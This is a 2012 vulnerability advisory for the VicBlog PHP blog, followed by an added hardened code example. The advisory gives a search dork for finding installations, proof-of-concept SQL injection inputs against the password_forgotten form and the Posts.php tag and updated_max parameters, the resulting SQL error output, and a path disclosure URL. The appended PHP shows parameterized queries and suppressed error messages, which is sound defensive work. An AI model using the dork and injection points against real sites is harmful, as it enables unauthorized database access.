# Author : Geek
# Title : Vicblog Multiple Vulnerabilities
# Date : 10/25/2012
# Dork : allintext: "Powered by VicBlog"
# Tested On : Winxp

# Multiple SQL Injection

{x} File : password_forgotten
{x} Code :
    $email = $_POST['email'];
    $sql = mysql_query("SELECT * FROM vb_accounts where email = '$email'");
{x} PoC : domain.tld/index.php?admin=password_forgotten
    In the "Forgotten Password?" field, put (x')
    Snap : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x''' at line 1

{x} File : Posts.php
{x} Code :
    $tag = isset($_GET['tag']) ? prepare_input($_GET['tag']) : "";
    $updated_max = isset($_GET['updated_max']) ? prepare_input($_GET['updated_max']) : "";
    Don't use the reverse and post id parameters, because the code checks whether they are (int) or not.
{x} PoC : domain.tld/index.php?page=posts${tag or updated_max parameter}=1[SQL]

# Path Disclosure

{x} File : /admin/index.php
{x} Code :
{x} PoC : domain.tld/index.php?admin=index

# End Of File
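
A hardened form of the password_forgotten lookup quoted above, as an added example that is not VicBlog's own code: the email is validated and bound as a query parameter instead of being interpolated, and database errors are logged rather than echoed to the page. The function name, the in-memory SQLite database standing in for MySQL, and the sample row are assumptions constructed for illustration; only the vb_accounts table and email column come from the advisory.

```php
<?php
// Added example (not VicBlog's own code). vb_accounts and email come from
// the advisory; the helper name and demo data are assumptions.

// Hypothetical helper: look up an account without building SQL from input.
function find_account_by_email(PDO $db, string $rawEmail): ?array
{
    // Reject anything that is not a syntactically valid address first.
    $email = filter_var(trim($rawEmail), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return null;
    }
    try {
        // The value travels as a bound parameter, so a quote in it stays data.
        $stmt = $db->prepare('SELECT * FROM vb_accounts WHERE email = :email');
        $stmt->execute([':email' => $email]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Log server-side; never show the driver's message to the visitor.
        error_log('password_forgotten lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Constructed demo data: SQLite in memory stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE vb_accounts (id INTEGER PRIMARY KEY, email TEXT)');
$db->exec("INSERT INTO vb_accounts (email) VALUES ('user@example.com')");

// The same generic reply is sent whether or not the address exists.
$reply = 'If that address is registered, a reset link has been sent.';
foreach (['user@example.com', "x'", 'nobody@example.com'] as $input) {
    // $found would drive the mail-sending step; the visitor only sees $reply.
    $found = find_account_by_email($db, $input) !== null;
    printf("%-20s found=%s -> %s\n", $input, $found ? 'yes' : 'no', $reply);
}
```

The same binding approach applies to the tag and updated_max parameters in Posts.php, and turning off display_errors in production removes the SQL error text shown in the Snap line.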